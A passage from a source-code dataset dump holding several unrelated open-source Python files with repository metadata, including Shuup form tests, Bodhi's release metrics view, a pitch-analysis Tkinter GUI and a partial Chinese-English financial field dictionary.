    all = []  # NOTE(review): shadows the builtin `all`
    while True:
        try:
            res = o_q.get(block=False)
            all.append(f"{res[0]},{res[1]}")
        except Exception as e:
            # queue.Empty terminates the drain.
            break
    with open("m.csv", 'w', encoding='utf8') as wh:
        wh.write("\n".join(all))
if __name__ == "__main__":
    # Load the numbers, then fan the lookups out across the worker threads.
    data = load_data()
    run(data)
| Svolcano/python_exercise | new/modian.py | Python | mit | 1,623 |
#!/usr/bin/env python
#chr13:30215500-30216000 output/rgn_1 1 26.84
#chr13:37798000-37798500 output/rgn_10 2 19.87
import argparse
# Build the CLI for filtering a depth table.
ap = argparse.ArgumentParser()
ap.add_argument("depth", help="depth table, 4 fields, region dir nContigs targetDepth")
ap.add_argument("--ncontigs", help="number of contigs.", default=None,type=int)
# NOTE(review): "--depth" maps to the same dest as the positional "depth"
# above, so the two values will clobber each other; parse_args() is also
# never called in this file -- confirm both are intended.
ap.add_argument("--depth", help="min depth")
| yunlongliukm/chm1_scripts | HardStop/FilterDepth.py | Python | mit | 395 |
# -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django import forms
from django.forms.models import modelform_factory
from django.utils.encoding import force_text
from shuup.core.models import MutableAddress
from shuup.utils.form_group import FormGroup
class GeneralForm(forms.Form):
    """Single required integer field; exercises a non-model member form."""
    field = forms.IntegerField(required=True)
def make_form_group(**kwargs):
    """Build a FormGroup with two address sub-forms and one general form.

    ``address1`` and ``general`` are required; ``address2`` is optional.
    """
    AddressForm = modelform_factory(MutableAddress, fields=("name", ))
    fg = FormGroup(**kwargs)
    fg.add_form_def("address1", AddressForm, required=True)
    fg.add_form_def("address2", AddressForm, required=False)
    fg.add_form_def("general", GeneralForm, required=True)
    return fg
def test_form_group():
    """Unbound, empty-bound, and validly-bound groups behave as expected."""
    # Unbound: member prefixes are set, but nothing validates.
    fg = make_form_group()
    assert fg.forms["address1"].prefix == "address1"
    assert not fg.is_valid()
    assert not fg.full_clean()
    # Bound to empty data: required members produce errors.
    fg = make_form_group(data={})
    assert fg.is_bound
    assert not fg.is_valid()
    assert fg.errors.get("address1")
    # Bound to complete data: the whole group validates cleanly.
    fg = make_form_group(data={"address1-name": "herp", "general-field": "343"})
    assert fg.forms["address1"].is_bound
    assert fg.is_valid()
    assert not fg.errors
def test_form_group_initial():
    """Prefixed initial values propagate into the rendered member fields."""
    fg = make_form_group(initial={"address1-name": "Yes Sir"})
    assert "Yes Sir" in force_text(fg["address1"]["name"])
| suutari/shoop | shuup_tests/utils/test_form_group.py | Python | agpl-3.0 | 1,487 |
# -*- coding: utf-8 -*-
# Copyright © 2014-2017 Red Hat, Inc. and others.
#
# This file is part of Bodhi.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""Define the view that presents release metrics in the web UI."""
import json
from pyramid.view import view_config
import bodhi.server.models as m
def compute_ticks_and_data(db, releases, update_types):
    """
    Return the data and ticks to make the stats graph.

    Args:
        db (sqlalchemy.orm.session.Session): The database Session.
        releases (list): A list of release objects we are interested in generating metrics on.
        update_types (dict): A dictionary mapping the possible types of updates to human readable
            string defining them.
    Returns:
        tuple: A 2-tuple of data that can be graphed by the UI javascript.
    """
    data, ticks = [], []
    # Key-based sort replaces the Python-2-only `cmp=` form; the ordering
    # (ascending numeric version) is unchanged and it now works on Python 3.
    releases = sorted(releases, key=lambda release: int(release.version_int))
    for i, release in enumerate(releases):
        ticks.append([i, release.name])
    for update_type, label in update_types.items():
        d = []
        update_type = m.UpdateType.from_string(update_type)
        for i, release in enumerate(releases):
            # Count stable updates of this type per release.
            num = db.query(m.Update).filter_by(
                release=release,
                type=update_type,
                status=m.UpdateStatus.stable
            ).count()
            d.append([i, num])
        data.append(dict(data=d, label=label))
    return (data, ticks)
@view_config(route_name='metrics', renderer='metrics.html')
def metrics(request):
    """
    Return a response with metric data to be graphed.
    Args:
        request (pyramid.util.Request): The current Request.
    Returns:
        dict: A dictionary with keys 'data', 'ticks', 'eldata', and 'elticks'. The 'el' prefixed
            keys are for enterprise Linux. These data are used to render the graphs by the template
            JavaScript.
    """
    db = request.db
    update_types = {
        'bugfix': 'Bug fixes',
        'enhancement': 'Enhancements',
        'security': 'Security updates',
        'newpackage': 'New packages'
    }
    # Fedora releases: names start with "F".
    releases = db.query(m.Release).filter(m.Release.name.like(u'F%')).all()
    data, ticks = compute_ticks_and_data(db, releases, update_types)
    # Enterprise Linux releases: names start with "E".
    releases = db.query(m.Release).filter(m.Release.name.like(u'E%')).all()
    eldata, elticks = compute_ticks_and_data(db, releases, update_types)
    return {
        'data': json.dumps(data), 'ticks': json.dumps(ticks),
        'eldata': json.dumps(eldata), 'elticks': json.dumps(elticks),
    }
| tyll/bodhi | bodhi/server/views/metrics.py | Python | gpl-2.0 | 3,279 |
from setuptools import setup, find_packages
from os.path import dirname, join
import phone_iso3166
def readfile(filename):
    """Return the full text of *filename*, resolved relative to this script."""
    path = join(dirname(__file__), filename)
    with open(path, 'r') as handle:
        return handle.read()
# Distribution metadata. The long description is read from the README so
# the PyPI page mirrors the repository front page.
setup(
    name="phone-iso3166",
    description="Phonenumber to ISO 3166-1 mapping",
    install_requires=[
    ],
    keywords="oc",
    long_description=readfile("README.rst"),
    version=phone_iso3166.__version__,
    packages=find_packages(),
    maintainer="OC dev team",
    maintainer_email="devs@oc.dk",
    license='MIT',
    classifiers=(
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Natural Language :: English'
    )
)
| mehulsbhatt/phone-iso3166 | setup.py | Python | mit | 980 |
"""pyzmq does not ship tornado's futures,
this just raises informative NotImplementedErrors to avoid having to change too much code.
"""
class NotImplementedFuture(object):
    """Stand-in for tornado's Future; any instantiation fails loudly."""

    def __init__(self, *args, **kwargs):
        message = (
            "pyzmq does not ship tornado's Futures, "
            "install tornado >= 3.0 for future support."
        )
        raise NotImplementedError(message)
Future = TracebackFuture = NotImplementedFuture
def is_future(x):
    """Return True when *x* is an instance of the Future placeholder."""
    return isinstance(x, Future)
| swn1/pyzmq | zmq/eventloop/minitornado/concurrent.py | Python | bsd-3-clause | 459 |
#!/usr/bin/env python
"""
pitchanalysis.py
--
Christopher Kuech
cjkuech@gmail.com
--
Requires:
Python 2.7
Instructions:
python pitchanalysis.py [wav-file-name]
"""
import matplotlib
from math import log
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import numpy as np
import pyaudio
import sys
from time import time, sleep
import Tkinter as tk
import wavelab
(WIDTH, HEIGHT) = (800, 500)  # canvas dimensions in pixels
FNAME = './Bach.wav' if len(sys.argv) != 2 else sys.argv[1]  # optional CLI wav path
font = ('Helvetica', 14, 'bold')  # label font for the Tk widgets
CHUNK = 1024  # frames written to the audio stream per loop iteration
def audioworker():
    """the function run on the audio thread: streams the sample buffer to
    the sound card in CHUNK-sized slices, looping over the clip forever."""
    global frame
    p = pyaudio.PyAudio()
    stream = p.open(format=p.get_format_from_width(2),
                    channels=1, rate=4*44100, output=True)
    # unknown why rate is off by 4x
    while True:
        stream.write(data[frame:frame+CHUNK].tostring())
        # Wrap on len(wav): `data` is the clip doubled, so a slice starting
        # near the end never runs out of samples.
        frame = (frame + CHUNK) % len(wav)
    # NOTE(review): the cleanup below is unreachable -- the loop never breaks.
    stream.stop_stream()
    stream.close()
    p.terminate()
def graphicsworker():
    """the function run on the graphics thread: redraws the spectrum plot

    Each iteration snapshots the widget settings, windows the current audio
    clip, plots its frequency spectrum under the selected power transform,
    and updates the pitch label, aiming for at most 30 redraws per second.
    """
    while True:
        start = time()
        # snapshot current widget settings for this frame
        p = ptype.get()
        w = wsize.get()
        wty = wtype.get()
        # compute frequencies from clip
        clip = data[frame:frame+w]
        if wty == "hanning":
            clip *= np.hanning(w)
        elif wty == "hamming":
            clip *= np.hamming(w)
        # presumably maps frequency -> amplitude — TODO confirm in wavelab
        freqs = wavelab.frequencies(clip)
        # update plot
        xs = np.sort(freqs.keys())
        ys = np.array(map(freqs.get, xs))
        axes.cla()
        (xmax, ymin, ymax) = (10e4, 0.000001, 10e2)
        # (xlim, ylim) = (_, (ymin, ymax)) = ((0, 1e4), (1e-3, 1e7))
        axes.set_xscale("log")
        axes.set_yscale("linear")
        axes.set_xlim((1, xmax))
        # transform the amplitudes and match the y-axis limits to the
        # selected power scale
        if p == "square":
            # axes.set_yscale("linear")
            axes.set_ylim((ymin**2, ymax**2))
            ys = ys * ys
        elif p == "dB":
            # axes.set_yscale("log")
            axes.set_ylim((log(ymin), log(ymax)))
            ys = np.log(ys)
        elif p == "-dB":
            # axes.set_yscale("log")
            axes.set_ylim((-log(ymax), -log(ymin)))
            ys = -np.log(ys)
        elif p == "linear":
            # axes.set_yscale("linear")
            axes.set_ylim((ymin, ymax))
        axes.plot(xs, ys, 'r-')
        canvas.show()
        # pitch tracker: label shows the pitch of the strongest frequency
        freq = max(freqs, key=lambda f: freqs[f])
        pitch.set(wavelab.pitch(freq).replace('/','\n'))
        # attempt to achieve 30fps animation (at best)
        dt = time() - start
        sleep(max(0, 1.0/30.0 - dt))
# read wave file
(framerate, wav) = wavelab.readwav(FNAME)
data = np.concatenate((wav, wav))  # doubled so slicing near the end can't overrun
frame = 0  # shared playback cursor, advanced by audioworker
# create a GUI instance (do before any use of Tkinter)
root = tk.Tk()
root.wm_title("Frequency Spectrogram")
# these objects hold the variables from the widgets
wsize = tk.IntVar()     # window size (in frames)
wsize.set(2205)
wtype = tk.StringVar()  # type of windowing to use
wtype.set("rectangle")
ptype = tk.StringVar()  # type of power to use
ptype.set("square")
pitch = tk.StringVar()  # the current pitch
pitch.set("")
# returns the dict of kwargs that initialize a Radiobutton widget
widgetps = lambda n, v: {'variable': v, 'text': n, 'value': n}
# create the canvas widget and add it to the GUI
# canvas = tk.Canvas(root, borderwidth=0, width=WIDTH, height=HEIGHT, bg='#000')
# canvas.grid(row=0, column=0, columnspan=4)
# canvas.show()
canvasframe = tk.Frame(root, width=WIDTH, height=HEIGHT)
canvasframe.grid(row=0, column=0, columnspan=4)
figure = Figure()
axes = figure.add_axes( (0.1, 0.1, 0.8, 0.8), frameon=True,
    xlabel="Frequency (Hz)", ylabel="Power")
canvas = FigureCanvasTkAgg(figure, canvasframe)
canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)
canvas.show()
# create the wtype controller and add it to the GUI
tk.Label(root, font=font, text="Windowing").grid(row=1, column=0, pady=10)
wframe = tk.Frame(root)
wframe.grid(row=2, column=0, pady=10, sticky="n")
tk.Radiobutton(wframe, **widgetps("rectangle", wtype)).grid(sticky="w", row=0)
tk.Radiobutton(wframe, **widgetps("hamming" , wtype)).grid(sticky="w", row=1)
tk.Radiobutton(wframe, **widgetps("hanning" , wtype)).grid(sticky="w", row=2)
# create the wsize controller and add it to the GUI
tk.Label(root, font=font, text="Window Size").grid(row=1, column=1, pady=10)
tk.Scale(root, variable=wsize, orient=tk.HORIZONTAL, from_=10, to=4410).grid(row=2, column=1, sticky="wen")
# create the ptype controller and add it to the GUI
tk.Label(root, font=font, text="Power").grid(row=1, column=2, pady=10)
pframe = tk.Frame(root)
pframe.grid(row=2, column=2, pady=10, sticky="n")
tk.Radiobutton(pframe, **widgetps("square", ptype)).grid(sticky="w", row=0)
tk.Radiobutton(pframe, **widgetps("dB", ptype)).grid(sticky="w", row=1)
tk.Radiobutton(pframe, **widgetps("-dB", ptype)).grid(sticky="w", row=2)
tk.Radiobutton(pframe, **widgetps("linear", ptype)).grid(sticky="w", row=3)
# create the area where the pitchlabel is displayed
tk.Label(root, font=font, text="Pitch").grid(row=1, column=3, pady=10)
(fontfamily, fontsize, fontweight) = font
pitchfont = (fontfamily, 24, fontweight)
# NOTE(review): .grid() returns None, so pitchlabel is always None — harmless
# since it is never referenced again, but the name is misleading
pitchlabel = tk.Label(root, font=pitchfont, textvariable=pitch, width=7).grid(row=2, column=3)
# start the other threads
wavelab.thread(audioworker)
wavelab.thread(graphicsworker)
# start the main update loop for the GUI (and block)
tk.mainloop()
| chriskuech/wavelab | pitchanalysis.py | Python | mit | 5,174 |
# coding:utf-8
financial_dict = {
# 1.每股指标
'001基本每股收益': 'EPS',
'002扣除非经常性损益每股收益': 'deductEPS',
'003每股未分配利润': 'undistributedProfitPerShare',
'004每股净资产': 'netAssetsPerShare',
'005每股资本公积金': 'capitalReservePerShare',
'006净资产收益率': 'ROE',
'007每股经营现金流量': 'operatingCashFlowPerShare',
# 2. 资产负债表 BALANCE SHEET
# 2.1 资产
# 2.1.1 流动资产
'008货币资金': 'moneyFunds',
'009交易性金融资产': 'tradingFinancialAssets',
'010应收票据': 'billsReceivables',
'011应收账款': 'accountsReceivables',
'012预付款项': 'prepayments',
'013其他应收款': 'otherReceivables',
'014应收关联公司款': 'interCompanyReceivables',
'015应收利息': 'interestReceivables',
'016应收股利': 'dividendsReceivables',
'017存货': 'inventory',
'018其中:消耗性生物资产': 'expendableBiologicalAssets',
'019一年内到期的非流动资产': 'noncurrentAssetsDueWithinOneYear',
'020其他流动资产': 'otherLiquidAssets',
'021流动资产合计': 'totalLiquidAssets',
# 2.1.2 非流动资产
'022可供出售金融资产': 'availableForSaleSecurities',
'023持有至到期投资': 'heldToMaturityInvestments',
'024长期应收款': 'longTermReceivables',
'025长期股权投资': 'longTermEquityInvestment',
'026投资性房地产': 'investmentRealEstate',
'027固定资产': 'fixedAssets',
'028在建工程': 'constructionInProgress',
'029工程物资': 'engineerMaterial',
'030固定资产清理': 'fixedAssetsCleanUp',
'031生产性生物资产': 'productiveBiologicalAssets',
'032油气资产': 'oilAndGasAssets',
'033无形资产': 'intangibleAssets',
'034开发支出': 'developmentExpenditure',
'035商誉': 'goodwill',
'036长期待摊费用': 'longTermDeferredExpenses',
'037递延所得税资产': 'deferredIncomeTaxAssets',
'038其他非流动资产': 'otherNonCurrentAssets',
'039非流动资产合计': 'totalNonCurrentAssets',
'040资产总计': 'totalAssets',
# 2.2 负债
# 2.2.1 流动负债
'041短期借款': 'shortTermLoan',
'042交易性金融负债': 'tradingFinancialLiabilities',
'043应付票据': 'billsPayable',
'044应付账款': 'accountsPayable',
'045预收款项': 'advancedReceivable',
'046应付职工薪酬': 'employeesPayable',
'047应交税费': 'taxPayable',
'048应付利息': 'interestPayable',
'049应付股利': 'dividendPayable',
'050其他应付款': 'otherPayable',
'051应付关联公司款': 'interCompanyPayable',
'052一年内到期的非流动负债': 'noncurrentLiabilitiesDueWithinOneYear',
'053其他流动负债': 'otherCurrentLiabilities',
'054流动负债合计': 'totalCurrentLiabilities',
# 2.2.2 非流动负债
'055长期借款': 'longTermLoans',
'056应付债券': 'bondsPayable',
'057长期应付款': 'longTermPayable',
'058专项应付款': 'specialPayable',
'059预计负债': 'estimatedLiabilities',
'060递延所得税负债': 'defferredIncomeTaxLiabilities',
'061其他非流动负债': 'otherNonCurrentLiabilities',
'062非流动负债合计': 'totalNonCurrentLiabilities',
'063负债合计': 'totalLiabilities',
# 2.3 所有者权益
'064实收资本(或股本)': 'totalShare',
'065资本公积': 'capitalReserve',
'066盈余公积': 'surplusReserve',
'067减:库存股': 'treasuryStock',
'068未分配利润': 'undistributedProfits',
'069少数股东权益': 'minorityEquity',
'070外币报表折算价差': 'foreignCurrencyReportTranslationSpread',
'071非正常经营项目收益调整': 'abnormalBusinessProjectEarningsAdjustment',
'072所有者权益(或股东权益)合计': 'totalOwnersEquity',
'073负债和所有者(或股东权益)合计': 'totalLiabilitiesAndOwnersEquity',
# 3. 利润表
'074其中:营业收入': 'operatingRevenue',
'075其中:营业成本': 'operatingCosts',
'076营业税金及附加': 'taxAndSurcharges',
'077销售费用': 'salesCosts',
'078管理费用': 'managementCosts',
'079堪探费用': 'explorationCosts',
'080财务费用': 'financialCosts',
'081资产减值损失': 'assestsDevaluation',
'082加:公允价值变动净收益': 'profitAndLossFromFairValueChanges',
'083投资收益': 'investmentIncome',
'084其中:对联营企业和合营企业的投资收益': 'investmentIncomeFromAffiliatedBusinessAndCooperativeEnterprise',
'085影响营业利润的其他科目': 'otherSubjectsAffectingOperatingProfit',
'086三、营业利润': 'operatingProfit',
'087加:补贴收入': 'subsidyIncome',
'088营业外收入': 'nonOperatingIncome',
'089减:营业外支出': 'nonOperatingExpenses',
'090其中:非流动资产处置净损失': 'netLossFromDisposalOfNonCurrentAssets',
'091加:影响利润总额的其他科目': 'otherSubjectsAffectTotalProfit',
'092四、利润总额': 'totalProfit',
'093减:所得税': 'incomeTax',
'094加:影响净利润的其他科目': 'otherSubjectsAffectNetProfit',
'095五、净利润': 'netProfit',
'096归属于母公司所有者的净利润': 'netProfitsBelongToParentCompanyOwner',
'097少数股东损益': 'minorityProfitAndLoss',
# 4. 现金流量表
# 4.1 经营活动 Operating
'098销售商品、提供劳务收到的现金': 'cashFromGoodsSalesorOrRenderingOfServices',
'099收到的税费返还': 'refundOfTaxAndFeeReceived',
'100收到其他与经营活动有关的现金': 'otherCashRelatedBusinessActivitiesReceived',
'101经营活动现金流入小计': 'cashInflowsFromOperatingActivities',
'102购买商品、接受劳务支付的现金': 'buyingGoodsReceivingCashPaidForLabor',
'103支付给职工以及为职工支付的现金': 'paymentToEmployeesAndCashPaidForEmployees',
'104支付的各项税费': 'paymentsOfVariousTaxes',
'105支付其他与经营活动有关的现金': 'paymentOfOtherCashRelatedToBusinessActivities',
'106经营活动现金流出小计': 'cashOutflowsFromOperatingActivities',
'107经营活动产生的现金流量净额': 'netCashFlowsFromOperatingActivities',
# 4.2 投资活动 Investment
'108收回投资收到的现金': 'cashReceivedFromInvestmentReceived',
'109取得投资收益收到的现金': 'cashReceivedFromInvestmentIncome',
'110处置固定资产、无形资产和其他长期资产收回的现金净额': 'disposalOfNetCashForRecoveryOfFixedAssetsIntangibleAssetsAndOtherLongTermAssets',
'111处置子公司及其他营业单位收到的现金净额': 'disposalOfNetCashReceivedFromSubsidiariesAndOtherBusinessUnits',
'112收到其他与投资活动有关的现金': 'otherCashReceivedRelatingToInvestingActivities',
'113投资活动现金流入小计': 'cashinFlowsFromInvestmentActivities',
'114购建固定资产、无形资产和其他长期资产支付的现金': 'cashForThePurchaseConstructionPaymentOfFixedAssetsIntangibleAssetsAndOtherLongTermAssets',
'115投资支付的现金': 'cashInvestment',
'116取得子公司及其他营业单位支付的现金净额': 'acquisitionOfNetCashPaidBySubsidiariesAndOtherBusinessUnits',
'117支付其他与投资活动有关的现金': 'otherCashPaidRelatingToInvestingActivities',
'118投资活动现金流出小计': 'cashOutflowsFromInvestmentActivities',
'119投资活动产生的现金流量净额': 'netCashFlowsFromInvestingActivities',
# 4.3 筹资活动 Financing
'120吸收投资收到的现金': 'cashReceivedFromInvestors',
'121取得借款收到的现金': 'cashFromBorrowings',
'122收到其他与筹资活动有关的现金': 'otherCashReceivedRelatingToFinancingActivities',
'123筹资活动现金流入小计': 'cashInflowsFromFinancingActivities',
'124偿还债务支付的现金': 'cashPaymentsOfAmountBorrowed',
'125分配股利、利润或偿付利息支付的现金': 'cashPaymentsForDistrbutionOfDividendsOrProfits',
'126支付其他与筹资活动有关的现金': 'otherCashPaymentRelatingToFinancingActivities',
'127筹资活动现金流出小计': 'cashOutflowsFromFinancingActivities',
'128筹资活动产生的现金流量净额': 'netCashFlowsFromFinancingActivities',
# 4.4 汇率变动
'129四、汇率变动对现金的影响': 'effectOfForeignExchangRateChangesOnCash',
'130四(2)、其他原因对现金的影响': 'effectOfOtherReasonOnCash',
# 4.5 现金及现金等价物净增加
'131五、现金及现金等价物净增加额': 'netIncreaseInCashAndCashEquivalents',
'132期初现金及现金等价物余额': 'initialCashAndCashEquivalentsBalance',
# 4.6 期末现金及现金等价物余额
'133期末现金及现金等价物余额': 'theFinalCashAndCashEquivalentsBalance',
# 4.x 补充项目 Supplementary Schedule:
# 现金流量附表项目 Indirect Method
# 4.x.1 将净利润调节为经营活动现金流量 Convert net profit to cash flow from operating activities
'134净利润': 'netProfitFromOperatingActivities',
'135资产减值准备': 'provisionForAssetsLosses',
'136固定资产折旧、油气资产折耗、生产性生物资产折旧': 'depreciationForFixedAssets',
'137无形资产摊销': 'amortizationOfIntangibleAssets',
'138长期待摊费用摊销': 'amortizationOfLong-termDeferredExpenses',
'139处置固定资产、无形资产和其他长期资产的损失': 'lossOfDisposingFixedAssetsIntangibleAssetsAndOtherLong-termAssets',
'140固定资产报废损失': 'scrapLossOfFixedAssets',
'141公允价值变动损失': 'lossFromFairValueChange',
'142财务费用': 'financialExpenses',
'143投资损失': 'investmentLosses',
'144递延所得税资产减少': 'decreaseOfDeferredTaxAssets',
'145递延所得税负债增加': 'increaseOfDeferredTaxLiabilities',
'146存货的减少': 'decreaseOfInventory',
'147经营性应收项目的减少': 'decreaseOfOperationReceivables',
'148经营性应付项目的增加': 'increaseOfOperationPayables',
'149其他': 'others',
'150经营活动产生的现金流量净额2': 'netCashFromOperatingActivities2',
# 4.x.2 不涉及现金收支的投资和筹资活动 Investing and financing activities not involved in cash
'151债务转为资本': 'debtConvertedToCSapital',
'152一年内到期的可转换公司债券': 'convertibleBondMaturityWithinOneYear',
'153融资租入固定资产': 'leaseholdImprovements',
# 4.x.3 现金及现金等价物净增加情况 Net increase of cash and cash equivalents
'154现金的期末余额': 'cashEndingBal',
'155现金的期初余额': 'cashBeginingBal',
'156现金等价物的期末余额': 'cashEquivalentsEndingBal',
'157现金等价物的期初余额': 'cashEquivalentsBeginningBal',
'158现金及现金等价物净增加额': 'netIncreaseOfCashAndCashEquivalents',
# 5. 偿债能力分析
'159流动比率': 'currentRatio', # 流动资产/流动负债
'160速动比率': 'acidTestRatio', # (流动资产-存货)/流动负债
'161现金比率(%)': 'cashRatio', # (货币资金+有价证券)÷流动负债
'162利息保障倍数': 'interestCoverageRatio', # (利润总额+财务费用(仅指利息费用部份))/利息费用
'163非流动负债比率(%)': 'noncurrentLiabilitiesRatio',
'164流动负债比率(%)': 'currentLiabilitiesRatio',
'165现金到期债务比率(%)': 'cashDebtRatio', # 企业经营现金净流入/(本期到期长期负债+本期应付票据)
'166有形资产净值债务率(%)': 'debtToTangibleAssetsRatio',
'167权益乘数(%)': 'equityMultiplier', # 资产总额/股东权益总额
'168股东的权益/负债合计(%)': 'equityDebtRatio', # 权益负债率
'169有形资产/负债合计(%)': 'tangibleAssetDebtRatio ', # 有形资产负债率
'170经营活动产生的现金流量净额/负债合计(%)': 'netCashFlowsFromOperatingActivitiesDebtRatio',
'171EBITDA/负债合计(%)': 'EBITDA/Liabilities',
# 6. 经营效率分析
# 销售收入÷平均应收账款=销售收入\(0.5 x(应收账款期初+期末))
'172应收帐款周转率': 'turnoverRatioOfReceivable;',
'173存货周转率': 'turnoverRatioOfInventory',
# (存货周转天数+应收帐款周转天数-应付帐款周转天数+预付帐款周转天数-预收帐款周转天数)/365
'174运营资金周转率': 'turnoverRatioOfOperatingAssets',
'175总资产周转率': 'turnoverRatioOfTotalAssets',
'176固定资产周转率': 'turnoverRatioOfFixedAssets', # 企业销售收入与固定资产净值的比率
'177应收帐款周转天数': 'daysSalesOutstanding', # 企业从取得应收账款的权利到收回款项、转换为现金所需要的时间
'178存货周转天数': 'daysSalesOfInventory', # 企业从取得存货开始,至消耗、销售为止所经历的天数
'179流动资产周转率': 'turnoverRatioOfCurrentAssets', # 流动资产周转率(次)=主营业务收入/平均流动资产总额
'180流动资产周转天数': 'daysSalesofCurrentAssets',
'181总资产周转天数': 'daysSalesofTotalAssets',
'182股东权益周转率': 'equityTurnover', # 销售收入/平均股东权益
# 7. 发展能力分析
'183营业收入增长率(%)': 'operatingIncomeGrowth',
'184净利润增长率(%)': 'netProfitGrowthRate', # NPGR 利润总额-所得税
'185净资产增长率(%)': 'netAssetsGrowthRate',
'186固定资产增长率(%)': 'fixedAssetsGrowthRate',
'187总资产增长率(%)': 'totalAssetsGrowthRate',
'188投资收益增长率(%)': 'investmentIncomeGrowthRate',
'189营业利润增长率(%)': 'operatingProfitGrowthRate',
'190暂无': 'None1',
'191暂无': 'None2',
'192暂无': 'None3',
# 8. 获利能力分析
'193成本费用利润率(%)': 'rateOfReturnOnCost',
'194营业利润率': 'rateOfReturnOnOperatingProfit',
'195营业税金率': 'rateOfReturnOnBusinessTax',
'196营业成本率': 'rateOfReturnOnOperatingCost',
'197净资产收益率': 'rateOfReturnOnCommonStockholdersEquity',
'198投资收益率': 'rateOfReturnOnInvestmentIncome',
'199销售净利率(%)': 'rateOfReturnOnNetSalesProfit',
'200总资产报酬率': 'rateOfReturnOnTotalAssets',
'201净利润率': 'netProfitMargin',
'202销售毛利率(%)': 'rateOfReturnOnGrossProfitFromSales',
'203三费比重': 'threeFeeProportion',
'204管理费用率': 'ratioOfChargingExpense',
'205财务费用率': 'ratioOfFinancialExpense',
'206扣除非经常性损益后的净利润': 'netProfitAfterExtraordinaryGainsAndLosses',
'207息税前利润(EBIT)': 'EBIT',
'208息税折旧摊销前利润(EBITDA)': 'EBITDA',
'209EBITDA/营业总收入(%)': 'EBITDA/GrossRevenueRate',
# 9. 资本结构分析
'210资产负债率(%)': 'assetsLiabilitiesRatio',
'211流动资产比率': 'currentAssetsRatio', # 期末的流动资产除以所有者权益
'212货币资金比率': 'monetaryFundRatio',
'213存货比率': 'inventoryRatio',
'214固定资产比率': 'fixedAssetsRatio',
'215负债结构比': 'liabilitiesStructureRatio',
'216归属于母公司股东权益/全部投入资本(%)': 'shareholdersOwnershipOfAParentCompany/TotalCapital',
'217股东的权益/带息债务(%)': 'shareholdersInterest/InterestRateDebtRatio',
'218有形资产/净债务(%)': 'tangibleAssets/NetDebtRatio',
# 10. 现金流量分析
'219每股经营性现金流(元)': 'operatingCashFlowPerShare',
'220营业收入现金含量(%)': 'cashOfOperatingIncome',
'221经营活动产生的现金流量净额/经营活动净收益(%)': 'netOperatingCashFlow/netOperationProfit',
'222销售商品提供劳务收到的现金/营业收入(%)': 'cashFromGoodsSales/OperatingRevenue',
'223经营活动产生的现金流量净额/营业收入': 'netOperatingCashFlow/OperatingRevenue',
'224资本支出/折旧和摊销': 'capitalExpenditure/DepreciationAndAmortization',
'225每股现金流量净额(元)': 'netCashFlowPerShare',
'226经营净现金比率(短期债务)': 'operatingCashFlow/ShortTermDebtRatio',
'227经营净现金比率(全部债务)': 'operatingCashFlow/LongTermDebtRatio',
'228经营活动现金净流量与净利润比率': 'cashFlowRateAndNetProfitRatioOfOperatingActivities',
'229全部资产现金回收率': 'cashRecoveryForAllAssets',
# 11. 单季度财务指标
'230营业收入': 'operatingRevenueSingle',
'231营业利润': 'operatingProfitSingle',
'232归属于母公司所有者的净利润': 'netProfitBelongingToTheOwnerOfTheParentCompanySingle',
'233扣除非经常性损益后的净利润': 'netProfitAfterExtraordinaryGainsAndLossesSingle',
'234经营活动产生的现金流量净额': 'netCashFlowsFromOperatingActivitiesSingle',
'235投资活动产生的现金流量净额': 'netCashFlowsFromInvestingActivitiesSingle',
'236筹资活动产生的现金流量净额': 'netCashFlowsFromFinancingActivitiesSingle',
'237现金及现金等价物净增加额': 'netIncreaseInCashAndCashEquivalentsSingle',
# 12.股本股东
'238总股本': 'totalCapital',
'239已上市流通A股': 'listedAShares',
'240已上市流通B股': 'listedBShares',
'241已上市流通H股': 'listedHShares',
'242股东人数(户)': 'numberOfShareholders',
'243第一大股东的持股数量': 'theNumberOfFirstMajorityShareholder',
'244十大流通股东持股数量合计(股)': 'totalNumberOfTopTenCirculationShareholders',
'245十大股东持股数量合计(股)': 'totalNumberOfTopTenMajorShareholders',
# 13.机构持股
'246机构总量(家)': 'institutionNumber',
'247机构持股总量(股)': 'institutionShareholding',
'248QFII机构数': 'QFIIInstitutionNumber',
'249QFII持股量': 'QFIIShareholding',
'250券商机构数': 'brokerNumber',
'251券商持股量': 'brokerShareholding',
'252保险机构数': 'securityNumber',
'253保险持股量': 'securityShareholding',
'254基金机构数': 'fundsNumber',
'255基金持股量': 'fundsShareholding',
'256社保机构数': 'socialSecurityNumber',
'257社保持股量': 'socialSecurityShareholding',
'258私募机构数': 'privateEquityNumber',
'259私募持股量': 'privateEquityShareholding',
'260财务公司机构数': 'financialCompanyNumber',
'261财务公司持股量': 'financialCompanyShareholding',
'262年金机构数': 'pensionInsuranceAgencyNumber',
'263年金持股量': 'pensionInsuranceAgencyShareholfing',
# 14.新增指标
# [注:季度报告中,若股东同时持有非流通A股性质的股份(如同时持有流通A股和流通B股),取的是包含同时持有非流通A股性质的流通股数]
'264十大流通股东中持有A股合计(股)': 'totalNumberOfTopTenCirculationShareholders',
'265第一大流通股东持股量(股)': 'firstLargeCirculationShareholdersNumber',
# [注:1.自由流通股=已流通A股-十大流通股东5%以上的A股;2.季度报告中,若股东同时持有非流通A股性质的股份(如同时持有流通A股和流通H股),5%以上的持股取的是不包含同时持有非流通A股性质的流通股数,结果可能偏大; 3.指标按报告期展示,新股在上市日的下个报告期才有数据]
'266自由流通股(股)': 'freeCirculationStock',
